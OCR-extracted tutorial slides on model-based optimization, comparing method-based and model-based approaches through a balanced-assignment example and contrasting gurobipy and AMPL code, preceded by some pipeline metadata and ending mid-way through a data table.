13056, null], [13056, 18537, null], [18537, 24970, null], [24970, 31951, null], [31951, 35218, null], [35218, 40559, null], [40559, 44177, null], [44177, 51129, null], [51129, 58525, null], [58525, 58525, null], [58525, 58525, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 58525, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 58525, null]], "pdf_page_numbers": [[0, 1154, 1], [1154, 6941, 2], [6941, 13056, 3], [13056, 18537, 4], [18537, 24970, 5], [24970, 31951, 6], [31951, 35218, 7], [35218, 40559, 8], [40559, 44177, 9], [44177, 51129, 10], [51129, 58525, 11], [58525, 58525, 12], [58525, 58525, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 58525, 0.15217]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
b3cd2873d25c0757f67c72ef97ad0332cd653ac6
Model-Based Optimization Principles and Trends Robert Fourer AMPL Optimization Inc. 4er@ampl.com 24th International Conference on Principles and Practice of Constraint Programming — Lille, France Tutorial 1, 28 August 2018, 14:00-15:00 Model-Based Optimization: Principles and Trends As optimization methods have been applied more broadly and effectively, a key factor in their success has been the adoption of a model-based approach. A researcher or analyst focuses on modeling the problem of interest, while the computation of a solution is left to general-purpose, off-the-shelf solvers; independent modeling languages and systems manage the difficulties of translating between the human modeler’s ideas and the computer software’s needs. This tutorial introduces model-based optimization with examples from the AMPL modeling language and various popular solvers; the presentation concludes by surveying current software, with special attention to the role of constraint programming. Outline Approaches to optimization ❖ Model-based vs. Method-based Modeling languages for model-based optimization ❖ Motivation for modeling languages ❖ Algebraic modeling languages ❖ Executable vs. declarative languages ❖ Survey of modeling language software Solvers for model-based optimization ❖ Linear ❖ Nonlinear ❖ Global ❖ Constraint Examples **Approaches to optimization** - Model-based vs. Method-based - Example: Balanced assignment **Modeling languages for model-based optimization** - Executable vs. declarative languages - Example: gurobipy vs. AMPL - Survey of modeling language software - Example: Balanced assignment in AMPL - Example: Nonlinear optimization in AMPL **Solvers for model-based optimization** - Constraint - Example: Balanced assignment via CP in AMPL Example: Balanced Assignment Motivation - meeting of employees from around the world Given - several employee categories (title, location, department, male/female) - a specified number of project groups Assign - each employee to a project group So that - the groups have about the same size - the groups are as “diverse” as possible with respect to all categories **Method-Based Approach** **Define an algorithm to build a balanced assignment** - Start with all groups empty - Make a list of people (employees) - For each person in the list: - Add to the group whose resulting “sameness” will be least ```plaintext Initialize all groups G = { } Repeat for each person p sMin = Infinity Repeat for each group G s = total "sameness" in G ∪ {p} if s < sMin then sMin = s GMin = G Assign person p to group GMin ``` **Balanced Assignment** **Method-Based Approach (cont’d)** **Define a computable concept of “sameness”** - Sameness of any two people: - Number of categories in which they are the same - Sameness of a group: - Sum of the sameness of all pairs of people in the group **Refine the algorithm to get better results** - Reorder the list of people - Locally improve the initial “greedy” solution by swapping group members - Seek further improvement through local search metaheuristics - What are the neighbors of an assignment? - How can two assignments combine to create a better one? Balanced Assignment Model-Based Approach Formulate a “minimal sameness” model - Define decision variables for assignment of people to groups - \( x_{ij} = 1 \) if person 1 assigned to group \( j \) - \( x_{ij} = 0 \) otherwise - Specify valid assignments through constraints on the variables - Formulate sameness as an objective to be minimized - Total sameness = sum of the sameness of all groups Send to an off-the-shelf solver - Choice of excellent linear-quadratic mixed-integer solvers - Zero-one optimization is a special case Given \[ P \quad \text{set of people} \] \[ C \quad \text{set of categories of people} \] \[ t_{ik} \quad \text{type of person } i \text{ within category } k, \text{ for all } i \in P, k \in C \] and \[ G \quad \text{number of groups} \] \[ g_{\text{min}} \quad \text{lower limit on people in a group} \] \[ g_{\text{max}} \quad \text{upper limit on people in a group} \] Define \[ s_{i_1i_2} = |\{k \in C: t_{i_1k} = t_{i_2k}\}|, \text{ for all } i_1 \in P, i_2 \in P \] \text{sameness of persons } i_1 \text{ and } i_2 Model-Based Formulation (cont’d) **Determine** \[ x_{ij} \in \{0,1\} = 1 \text{ if person } i \text{ is assigned to group } j \] \[ = 0 \text{ otherwise, for all } i \in P, j = 1, \ldots, G \] **To minimize** \[ \sum_{i_1 \in P} \sum_{i_2 \in P} s_{i_1i_2} \sum_{j=1}^{G} x_{i_1j} x_{i_2j} \] *total sameness of all pairs of people in all groups* **Subject to** \[ \sum_{j=1}^{G} x_{ij} = 1, \text{ for each } i \in P \] *each person must be assigned to one group* \[ g_{\text{min}} \leq \sum_{i \in P} x_{ij} \leq g_{\text{max}}, \text{ for each } j = 1, \ldots, G \] *each group must be assigned an acceptable number of people* Model-Based Solution Optimize with an off-the-shelf solver Choose among many alternatives - Linearize and send to a mixed-integer linear solver * CPLEX, Gurobi, Xpress; CBC, MIPCL, SCIP - Send quadratic formulation to a mixed-integer solver that automatically linearizes products involving binary variables * CPLEX, Gurobi, Xpress - Send quadratic formulation to a nonlinear solver * Mixed-integer nonlinear: Knitro, BARON * Continuous nonlinear (might come out integer): MINOS, Ipopt, ... Where Is the Work? Method-based - Programming an implementation of the method Model-based - Constructing a formulation of the model Complications in Balanced Assignment “Total Sameness” is problematical ❖ Hard for client to relate to goal of diversity ❖ Minimize “total variation” instead ∗ Sum over all types: most minus least assigned to any group Client has special requirements ❖ No employee should be “isolated” within their group ∗ No group can have exactly one woman ∗ Every person must have a group-mate from the same location and of equal or adjacent rank Room capacities are variable ❖ Different groups have different size limits ❖ Minimize “total deviation” ∗ Sum over all types: greatest violation of target range for any group Method-Based (cont’d) **Revise or replace the solution approach** - Total variation is less suitable to a greedy algorithm - Total variation is harder to locally improve - Client constraints are challenging to enforce **Update or re-implement the method** - Even small changes to the problem can necessitate major changes to the method and its implementation Balanced Assignment **Model-Based (cont’d)** Replace the objective Formulate additional constraints Send back to the solver Balanced Assignment Model-Based (cont’d) To write new objective, add variables \[ y_{kl}^{\min} \] fewest people of category \( k \), type \( l \) in any group, \[ y_{kl}^{\max} \] most people of category \( k \), type \( l \) in any group, for each \( k \in C, l \in T_k = \bigcup_{i \in P} \{t_{ik}\} \) Add defining constraints \[ y_{kl}^{\min} \leq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \] \[ y_{kl}^{\max} \geq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \] Minimize total variation \[ \sum_{k \in C} \sum_{l \in T_k} (y_{kl}^{\max} - y_{kl}^{\min}) \] Balanced Assignment Model-Based (cont’d) To express client requirement for women in a group, let \[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \] Add constraints \[ \sum_{i \in Q} x_{ij} = 0 \text{ or } \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \] Balanced Assignment Model-Based (cont’d) To express client requirement for women in a group, let \[ Q = \{i \in P : t_{i,m/f} = \text{female}\} \] Define logic variables \[ z_j \in \{0,1\} = 1 \text{ if any women assigned to group } j \] \[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \] Add constraints relating logic variables to assignment variables \[ z_j = 0 \Rightarrow \sum_{i \in Q} x_{ij} = 0, \] \[ z_j = 1 \Rightarrow \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \] Model-Based (cont’d) To express client requirement for women in a group, let \[ Q = \{i \in P: t_{i,m/f} = \text{female}\} \] Define logic variables \[ z_j \in \{0,1\} = 1 \text{ if any women assigned to group } j \] \[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \] Linearize constraints relating logic variables to assignment variables \[ 2z_j \leq \sum_{i \in Q} x_{ij} \leq |Q| z_j, \text{ for each } j = 1, \ldots, G \] Balanced Assignment Model-Based (cont’d) To express client requirements for group-mates, let \[ R_{l_1l_2} = \{ i \in P : t_{i,\text{loc}} = l_1, t_{i,\text{rank}} = l_2 \}, \text{ for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}} \] \[ A_l \subseteq T_{\text{rank}}, \text{ set of ranks adjacent to rank } l, \text{ for all } l \in T_{\text{rank}} \] Add constraints \[ \sum_{i \in R_{l_1l_2}} x_{ij} = 0 \text{ or } \sum_{i \in R_{l_1l_2}} x_{ij} + \sum_{l \in A_l} \sum_{i \in R_{l_1l}} x_{ij} \geq 2, \] for each \( l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \) Balanced Assignment Model-Based (cont’d) To express client requirements for group-mates, let \[ R_{l_1 l_2} = \{ i \in P : t_{i, \text{loc}} = l_1, t_{i, \text{rank}} = l_2 \}, \text{ for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}} \] \[ A_l \subseteq T_{\text{rank}}, \text{ set of ranks adjacent to rank } l, \text{ for all } l \in T_{\text{rank}} \] Define logic variables \[ w_{l_1 l_2 j} \in \{0,1\} = 1 \text{ if group } j \text{ has anyone from location } l_1 \text{ of rank } l_2; \] \[ = 0 \text{ otherwise, for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \] Add constraints relating logic variables to assignment variables \[ w_{l_1 l_2 j} = 0 \Rightarrow \sum_{i \in R_{l_1 l_2}} x_{ij} = 0, \] \[ w_{l_1 l_2 j} = 1 \Rightarrow \sum_{i \in R_{l_1 l_2}} x_{ij} + \sum_{l \in A_l} \sum_{i \in R_{l_1 l}} x_{ij} \geq 2, \] for each \( l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \) Balanced Assignment Model-Based (cont’d) To express client requirements for group-mates, let $$R_{l_1l_2} = \{i \in P: t_{i,\text{loc}} = l_1, t_{i,\text{rank}} = l_2\}, \text{ for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}$$ $$A_l \subseteq T_{\text{rank}}, \text{ set of ranks adjacent to rank } l, \text{ for all } l \in T_{\text{rank}}$$ Define logic variables $$w_{l_1l_2j} \in \{0,1\} = 1 \text{ if group } j \text{ has anyone from location } l_1 \text{ of rank } l_2$$ $$= 0 \text{ otherwise, for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1,\ldots,G$$ Linearize constraints relating logic variables to assignment variables $$w_{l_1l_2j} \leq \sum_{i \in R_{l_1l_2}} x_{ij} \leq |R_{l_1l_2}| w_{l_1l_2j},$$ $$\sum_{i \in R_{l_1l_2}} x_{ij} + \sum_{l \in A_l} \sum_{i \in R_{l_1l}} x_{ij} \geq 2w_{l_1l_2j},$$ for each $$l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1,\ldots,G$$ Method-Based Remains Popular for . . . **Heuristic approaches** - Simple heuristics - Greedy algorithms, local improvement methods - Metaheuristics - Evolutionary methods, simulated annealing, tabu search, GRASP, . . . **Situations hard to formulate mathematically** - Difficult combinatorial constraints - Black-box objectives and constraints **Large-scale, intensive applications** - Routing fleets of delivery trucks - Finding shortest routes in mapping apps - Deep learning for facial recognition Model-Based Has Become Common in . . . **Diverse industries** - Manufacturing, distribution, supply-chain management - Air and rail operations, trucking, delivery services - Medicine, medical services - Refining, electric power flow, gas pipelines, hydropower - Finance, e-commerce, . . . **Diverse fields** - Operations research & management science - Business analytics - Engineering & science - Economics & finance Model-Based Has Become Standard for . . . Diverse industries Diverse fields Diverse kinds of users - Anyone who took an “optimization” class - Anyone else with a technical background - Newcomers to optimization These have in common . . . - Good algebraic formulations for off-the-shelf solvers - Users focused on modeling Trends Favor Model-Based Optimization *Model-based approaches have spread* - Model-based metaheuristics (“Matheuristics”) - Solvers for SAT, planning, *constraint programing* *Off-the-shelf optimization solvers have kept improving* - Solve the same problems faster and faster - Handle broader problem classes - Recognize special cases automatically *Optimization models have become easier to embed within broader methods* - Solver callbacks - Model-based evolution of solver APIs - APIs for optimization modeling systems Modeling Languages for Model-Based Optimization Background - The modeling lifecycle - Matrix generators - Modeling languages Algebraic modeling languages - Design approaches: declarative, executable - Example: AMPL vs. gurobipy - Survey of available software Balanced assignment model in AMPL - Formulation - Solution The Optimization Modeling Lifecycle 1. Communicate with Client 2. Build Model 3. Prepare Data 4. Generate Optimization Problem 5. Submit Problem to Solver 6. Report & Analyze Results Managing the Modeling Lifecycle Goals for optimization software - Repeat the cycle quickly and reliably - Get results before client loses interest - Deploy for application Complication: two forms of an optimization problem - Modeler’s form - Mathematical description, easy for people to work with - Solver’s form - Explicit data structure, easy for solvers to compute with Challenge: translate between these two forms Matrix Generators Write a program to generate the solver’s form - Read data and compute objective & constraint coefficients - Communicate with the solver via its API - Convert the solver’s solution for viewing or processing Some attractions - Ease of embedding into larger systems - Access to advanced solver features Serious disadvantages - Difficult environment for modeling * program does not resemble the modeler’s form * model is not separate from data - Very slow modeling cycle * hard to check the program for correctness * hard to distinguish modeling from programming errors Over the past seven years we have perceived that the size distribution of general structure LP problems being run on commercial LP codes has remained about stable. A 3000 constraint LP model is still considered large and very few LP problems larger than 6000 rows are being solved on a production basis. That this distribution has not noticeably changed despite a massive change in solution economics is unexpected. We do not feel that the linear programming user’s most pressing need over the next few years is for a new optimizer that runs twice as fast on a machine that costs half as much (although this will probably happen). Cost of optimization is just not the dominant barrier to LP model implementation. The process required to manage the data, formulate and build the model, report on and analyze the results costs far more, and is much more of a barrier to effective use of LP, than the cost/performance of the optimizer. Why aren’t more larger models being run? It is not because they could not be useful; it is because we are not successful in using them. They become unmanageable. LP technology has reached the point where anything that can be formulated and understood can be optimized at a relatively modest cost. Modeling Languages *Describe your model* - Write your symbolic model in a *computer-readable modeler’s form* - Prepare data for the model - Let computer translate to & from the solver’s form *Limited drawbacks* - Need to learn a new language - Incur overhead in translation - Make formulations clearer and hence easier to steal? *Great advantages* - Faster modeling cycles - More reliable modeling - More maintainable applications The aim of this system is to provide one representation of a model which is easily understood by both humans and machines. With such a notation, the information content of the model representation is such that a machine can not only check for algebraic correctness and completeness, but also interface automatically with solution algorithms and report writers. ... a significant portion of total resources in a modeling exercise ... is spent on the generation, manipulation and reporting of models. It is evident that this must be reduced greatly if models are to become effective tools in planning and decision making. The heart of it all is the fact that solution algorithms need a data structure which, for all practical purposes, is impossible to comprehend by humans, while, at the same time, meaningful problem representations for humans are not acceptable to machines. We feel that the two translation processes required (to and from the machine) can be identified as the main source of difficulties and errors. GAMS is a system that is designed to eliminate these two translation processes, thereby lifting a technical barrier to effective modeling ... These two forms of a linear program — the modeler’s form and the algorithm’s form — are not much alike, and yet neither can be done without. Thus any application of linear optimization involves translating the one form to the other. This process of translation has long been recognized as a difficult and expensive task of practical linear programming. In the traditional approach to translation, the work is divided between modeler and machine. . . . There is also a quite different approach to translation, in which as much work as possible is left to the machine. The central feature of this alternative approach is a modeling language that is written by the modeler and translated by the computer. A modeling language is not a programming language; rather, it is a declarative language that expresses the modeler’s form of a linear program in a notation that a computer system can interpret. Algebraic Modeling Languages Designed for a model-based approach - Define data in terms of sets & parameters - Analogous to database keys & records - Define decision variables - Minimize or maximize an algebraic function of decision variables - Subject to algebraic equations or inequalities that constrain the values of the variables Advantages - Familiar - Powerful - Proven Overview Design alternatives - **Executable**: object libraries for programming languages - **Declarative**: specialized optimization languages Design comparison - Executable versus declarative using one simple example Survey - Solver-independent vs. solver-specific - Proprietary vs. free - Notable specific features Executable Concept - Create an algebraic modeling language inside a general-purpose programming language - Redefine operators like + and <= to return constraint objects rather than simple values Advantages - Ready integration with applications - Good access to advanced solver features Disadvantages - Programming issues complicate description of the model - Modeling and programming bugs are hard to separate - Efficiency issues are more of a concern Algebraic Modeling Languages Declarative Concept - Design a language specifically for optimization modeling - Resembles mathematical notation as much as possible - Extend to command scripts and database links - Connect to external applications via APIs Disadvantages - Adds a system between application and solver - Does not have a full object-oriented programming framework Advantages - Streamlines model development - Promotes validation and maintenance of models - Can provide APIs for many popular programming languages Comparison: Executable vs. Declarative Two representative widely used systems - Executable: *gurobipy* - Python modeling interface for Gurobi solver - http://gurobi.com - Declarative: *AMPL* - Specialized modeling language with multi-solver support - http://ampl.com Comparison Data gurobipy - Assign values to Python lists and dictionaries ``` commodities = ['Pencils', 'Pens'] nodes = ['Detroit', 'Denver', 'Boston', 'New York', 'Seattle'] arcs, capacity = multidict({ ('Detroit', 'Boston'): 100, ('Detroit', 'New York'): 80, ('Detroit', 'Seattle'): 120, ('Denver', 'Boston'): 120, ('Denver', 'New York'): 120, ('Denver', 'Seattle'): 120 }) ``` - Provide data later in a separate file AMPL - Define symbolic model sets and parameters ``` set COMMODITIES; set NODES; set ARCS within {NODES,NODES}; param capacity {ARCS} >= 0; set COMMODITIES := Pencils Pens; set NODES := Detroit Denver Boston 'New York' Seattle; param: ARCS: capacity: Boston 'New York' Seattle := Detroit 100 80 120 Denver 120 120 120; ``` ### Data (cont’d) #### gurobipy <table> <thead> <tr> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td>50</td> <td>60</td> <td>-50</td> <td>-50</td> <td>-10</td> <td>60</td> <td>40</td> <td>-40</td> <td>-30</td> <td>-30</td> </tr> </tbody> </table> #### AMPL ```AMPL param inflow {COMMODITIES,NODES}; param inflow (tr): Pencils Pens := Detroit 50 60 Denver 60 40 Boston -50 -40 'New York' -50 -30 Seattle -10 -30 ; ``` Comparison Data (cont’d) gurobipy cost = { ('Pencils', 'Detroit', 'Boston'): 10, ('Pencils', 'Detroit', 'New York'): 20, ('Pencils', 'Detroit', 'Seattle'): 60, ('Pencils', 'Denver', 'Boston'): 40, ('Pencils', 'Denver', 'New York'): 40, ('Pencils', 'Denver', 'Seattle'): 30, ('Pens', 'Detroit', 'Boston'): 20, ('Pens', 'Detroit', 'New York'): 20, ('Pens', 'Detroit', 'Seattle'): 80, ('Pens', 'Denver', 'Boston'): 60, ('Pens', 'Denver', 'New York'): 70, ('Pens', 'Denver', 'Seattle'): 30 } Comparison Data (cont’d) AMPL | param cost {COMMODITIES, ARCS} >= 0; | |--|--|--|--| | [Pencils,*,*] (tr) Detroit Denver := | | Boston 10 40 | | 'New York' 20 40 | | Seattle 60 30 | | [Pens,*,*] (tr) Detroit Denver := | | Boston 20 60 | | 'New York' 20 70 | | Seattle 80 30 | **Comparison** **Model** **gurobipy** ```python m = Model('netflow') flow = m.addVars(commodities, arcs, obj=cost, name="flow") m.addConstrs( (flow.sum('*',i,j) <= capacity[i,j] for i,j in arcs), "cap") m.addConstrs( (flow.sum(h,'*',j) + inflow[h,j] == flow.sum(h,j,'*') for h in commodities for j in nodes), "node") ``` ```python for i,j in arcs: m.addConstr( sum(flow[h,i,j] for h in commodities) <= capacity[i,j], "cap[%s,%s]" % (i,j)) m.addConstrs( (quicksum(flow[h,i,j] for i,j in arcs.select('*','j')) + inflow[h,j] == quicksum(flow[h,j,k] for j,k in arcs.select(j,'*')) for h in commodities for j in nodes), "node") ``` Comparison (Note on Summations) gurobipy quicksum ```python m.addConstrs( (quicksum(flow[h,i,j] for i,j in arcs.select('*',j)) + inflow[h,j] == quicksum(flow[h,j,k] for j,k in arcs.select(j,'*')) for h in commodities for j in nodes), "node") ``` **quicksum**( data ) A version of the Python sum function that is much more efficient for building large Gurobi expressions (LinExpr or QuadExpr objects). The function takes a list of terms as its argument. Note that while quicksum is much faster than sum, it isn’t the fastest approach for building a large expression. Use addTerms or the LinExpr() constructor if you want the quickest possible expression construction. Comparison Model (cont’d) AMPL ``` var Flow {COMMODITIES, ARCS} >= 0; minimize TotalCost: sum {h in COMMODITIES, (i,j) in ARCS} cost[h,i,j] * Flow[h,i,j]; subject to Capacity {(i,j) in ARCS}: sum {h in COMMODITIES} Flow[h,i,j] <= capacity[i,j]; subject to Conservation {h in COMMODITIES, j in NODES}: sum {(i,j) in ARCS} Flow[h,i,j] + inflow[h,j] = sum {(j,i) in ARCS} Flow[h,j,i]; ``` **Comparison** **Solution** ```python m.optimize() if m.status == GRB.Status.OPTIMAL: solution = m.getAttr('x', flow) for h in commodities: print('\nOptimal flows for %s:' % h) for i, j in arcs: if solution[h, i, j] > 0: print('%s -> %s: %g' % (i, j, solution[h, i, j])) ``` Comparison Solution (cont’d) AMPL ```ampl AMPL: solve; Gurobi 8.0.0: optimal solution; objective 5500 2 simplex iterations AMPL: display Flow; Flow [Pencils,*,*] : Boston 'New York' Seattle := Denver 0 50 10 Detroit 50 0 0 [Pens,*,*] : Boston 'New York' Seattle := Denver 10 0 30 Detroit 30 30 0 ``` ; Comparison Integration with Solvers gurobipy - Works closely with the Gurobi solver: callbacks during optimization, fast re-solves after problem changes - Offers convenient extended expressions: min/max, and/or, if-then-else AMPL - Supports all popular solvers - Extends to general nonlinear and logic expressions - Connects to nonlinear function libraries and user-defined functions - Automatically computes nonlinear function derivatives Comparison Integration with Applications gurobipy - Everything can be developed in Python - Extensive data, visualization, deployment tools available - Limited modeling features also in C++, C#, Java AMPL - Modeling language extended with loops, tests, assignments - Application programming interfaces (APIs) for calling AMPL from C++, C#, Java, MATLAB, Python, R - Efficient methods for data interchange - Add-ons for streamlined deployment - QuanDec by Cassotis - Opalytics Cloud Platform Algebraic Modeling Languages Software Survey Solver-specific - Associated with popular commercial solvers - Executable and declarative alternatives Solver-independent - Support multiple solvers and solver types - Mostly commercial/declarative and free/executable Survey Solver-Specific Declarative, commercial - OPL for CPLEX (IBM) - MOSEL* for Xpress (FICO) - OPTMODEL for SAS/OR (SAS) Executable, commercial - Concert Technology C++ for CPLEX - gurobipy for Gurobi - sasoptpy for SAS Optimization Survey Solver-Independent Declarative, commercial - AIMMS - AMPL - GAMS - MPL Declarative, free - CMPL - GMPL / MathProg Executable, free - PuLP; Pyomo / Python - YALMIP; CVX / MATLAB - JuMP / Julia - FLOPC++ / C++ Algebraic Modeling Languages Trends Commercial, declarative modeling systems - Established lineup of solver-independent modeling systems that represent decades of development and support - Extended with scripting, APIs, data tools to promote integration with broader applications Commercial, executable modeling systems - Increasingly essential to commercial solver offerings - Becoming the recommended APIs for solvers Free, executable modeling systems - A major current focus of free optimization software development - Interesting new executable modeling languages have become easier to develop than interesting new solvers Notable cases not detailed earlier . . . - **AIMMS (solver-independent, commercial, declarative)** has extensive application development tools built in - **CMPL (solver-independent, free, declarative)** has an IDE, Python and Java APIs, and remote server support - **GMPL/MathProg (solver-independent, free, declarative)** is a free implementation of mainly a subset of AMPL - **JuMP (solver-independent, free, executable)** claims greater efficiency through use of a new programming language, Julia - **MOSEL for Xpress (solver-specific, commercial)** a hybrid of declarative and executable, has recently been made free and may accept other solvers Balanced Assignment Revisited Given - $P$ set of people - $C$ set of categories of people - $t_{ik}$ type of person $i$ within category $k$, for all $i \in P, k \in C$ and - $G$ number of groups - $g_{\text{min}}$ lower limit on people in a group - $g_{\text{max}}$ upper limit on people in a group Define - $T_k = \bigcup_{i \in P} \{t_{ik}\}$, for all $k \in C$ - set of all types of people in category $k$ Balanced Assignment Revisited in AMPL Sets, parameters set PEOPLE; # individuals to be assigned set CATEG; param type {PEOPLE,CATEG} symbolic; # categories by which people are classified; # type of each person in each category param numberGrps integer > 0; param minInGrp integer > 0; param maxInGrp integer >= minInGrp; # number of groups; bounds on size of groups set TYPES {k in CATEG} = setof {i in PEOPLE} type[i,k]; # all types found in each category Balanced Assignment Determine \[ x_{ij} \in \{0,1\} = 1 \text{ if person } i \text{ is assigned to group } j \] \[ = 0 \text{ otherwise, for all } i \in P, j = 1, \ldots, G \] \[ y_{kl}^{\min} \] fewest people of category \( k \), type \( l \) in any group, \[ y_{kl}^{\max} \] most people of category \( k \), type \( l \) in any group, for each \( k \in C, l \in T_k \) Where \[ y_{kl}^{\min} \leq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \] \[ y_{kl}^{\max} \geq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \] Balanced Assignment *in AMPL* **Variables, defining constraints** ```AMPL var Assign {i in PEOPLE, j in 1..numberGrps} binary; # Assign[i,j] is 1 if and only if # person i is assigned to group j var MinType {k in CATEG, TYPES[k]}; var MaxType {k in CATEG, TYPES[k]}; # fewest and most people of each type, over all groups subj to MinTypeDefn {j in 1..numberGrps, k in CATEG, l in TYPES[k]}: MinType[k,l] <= sum {i in PEOPLE: type[i,k] = l} Assign[i,j]; subj to MaxTypeDefn {j in 1..numberGrps, k in CATEG, l in TYPES[k]}: MaxType[k,l] >= sum {i in PEOPLE: type[i,k] = l} Assign[i,j]; # values of MinTypeDefn and MaxTypeDefn variables # must be consistent with values of Assign variables \[ y_{kl}^{\text{max}} \geq \sum_{i \in P: t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, \ l \in T_k \] ``` Balanced Assignment Minimize \[ \sum_{k \in C} \sum_{l \in T_k} (y_{kl}^{\text{max}} - y_{kl}^{\text{min}}) \] sum of inter-group variation over all types in all categories Subject to \[ \sum_{j=1}^{G} x_{ij} = 1, \text{ for each } i \in P \] each person must be assigned to one group \[ g^{\text{min}} \leq \sum_{i \in P} x_{ij} \leq g^{\text{max}}, \text{ for each } j = 1, \ldots, G \] each group must be assigned an acceptable number of people Balanced Assignment in AMPL Objective, assignment constraints minimize TotalVariation: sum {k in CATEG, l in TYPES[k]} (MaxType[k,l] - MinType[k,l]); # Total variation over all types subj to AssignAll {i in PEOPLE}: sum {j in 1..numberGrps} Assign[i,j] = 1; # Each person must be assigned to one group subj to GroupSize {j in 1..numberGrps}: minInGrp <= sum {i in PEOPLE} Assign[i,j] <= maxInGrp; # Each group must have an acceptable size \[ g_{\min} \leq \sum_{i \in P} x_{ij} \leq g_{\max}, \text{ for each } j = 1, \ldots, G \] Balanced Assignment Define also \[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \] Determine \[ z_j \in \{0, 1\} = 1 \text{ if any women assigned to group } j \] \[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \] Subject to \[ 2z_j \leq \sum_{i \in Q} x_{ij} \leq |Q| z_j, \text{ for each } j = 1, \ldots, G \] \[ \text{each group must have either} \] \[ \text{no women } (z_j = 0) \text{ or } \geq 2 \text{ women } (z_j = 1) \] Balanced Assignment in AMPL Supplemental constraints \[ \text{set WOMEN = \{i in PEOPLE: type[i,'m/f'] = 'F'\};} \] \[ \text{var WomenInGroup \{j in 1..numberGrps\} binary;} \] \[ \text{subj to Min2WomenInGroupLO \{j in 1..numberGrps\}:} \] \[ 2 \times \text{WomenInGroup}[j] \leq \text{sum \\{i in WOMEN\} Assign[i,j];} \] \[ \text{subj to Min2WomenInGroupUP \{j in 1..numberGrps\}:} \] \[ \text{sum \\{i in WOMEN\} Assign[i,j] \leq \text{card(WOMEN)} \times \text{WomenInGroup}[j];} \] \[2z_j \leq \sum_{i\in Q} x_{ij} \leq |Q| z_j, \text{ for each } j = 1, \ldots, G\] **Balanced Assignment** **Modeling Language Data** 210 people <table> <thead> <tr> <th>PEOPLE :=</th> </tr> </thead> <tbody> <tr> <td>BIW AJH FWI IGN KWR KKI HNN SML RSR TBR</td> </tr> <tr> <td>KRS CAE MPO CAR PSL BGC DJA AJT JPY HWG</td> </tr> <tr> <td>TLR MRL JDS JAE TEN MKA NMA PAS DLD SCG</td> </tr> <tr> <td>VAA FTR GCY OGZ SME KKA MMN API ASA JLN</td> </tr> <tr> <td>JRT SJO WMS RLL WLB SGA MRE SDN HAN JSG</td> </tr> <tr> <td>AMR DHY JMS AGI RHE BLE SMA BAN JAP HER</td> </tr> <tr> <td>MES DHE SWS ACI RHY TWD MAA JFR LHS</td> </tr> <tr> <td>JAD CWU PMY CAH SJH EGR JMQ GGH MMN JWR</td> </tr> <tr> <td>MFR EAZ WAD LVN DHR ABE LSR MTB AJU SAS</td> </tr> <tr> <td>JRS RFS TAR DLT HJO SCR CMY GDE MSL CGS</td> </tr> <tr> <td>HCN JWS RPR RCR RLS DSF MNA MSR PSY MET</td> </tr> <tr> <td>DAN RVY PWS CTS KLN RDN ANV LMN FSM KWN</td> </tr> <tr> <td>CWT PMO EJD AJS SBK JWB SNN PST PSZ AWN</td> </tr> <tr> <td>DCN RGR CPR NHI HKA VMA DMN KRA CSN HRR</td> </tr> <tr> <td>SWR LLR AVI RHA KWW MLE FJL ESO TSY WHF</td> </tr> <tr> <td>TBB FEE MTH RMN WFS CEH SOL ASO MDN RGE</td> </tr> <tr> <td>LVO ADS CGH RHD MBM MRH RGF PSA TTI HMG</td> </tr> <tr> <td>ECA CFS MKN SBM RCG JMA EGL UJT ETN GWZ</td> </tr> <tr> <td>MAI DBN HFE PSO APT JMT RJF MRZ MKR XYF</td> </tr> <tr> <td>JCO PSN SCS RDL TMN CGY GMR SER RMS JFN</td> </tr> <tr> <td>DWO REN DGR DET FJT RJZ MBY RSN REZ BLW</td> </tr> </tbody> </table> Balanced Assignment Modeling Language Data 4 categories, 18 types, 12 groups, 16-19 people/group ``` set CATEG := dept loc 'm/f' title ; param type: dept loc 'm/f' title := BIW NNE Peoria M Assistant KRS WSW Springfield F Assistant TLR 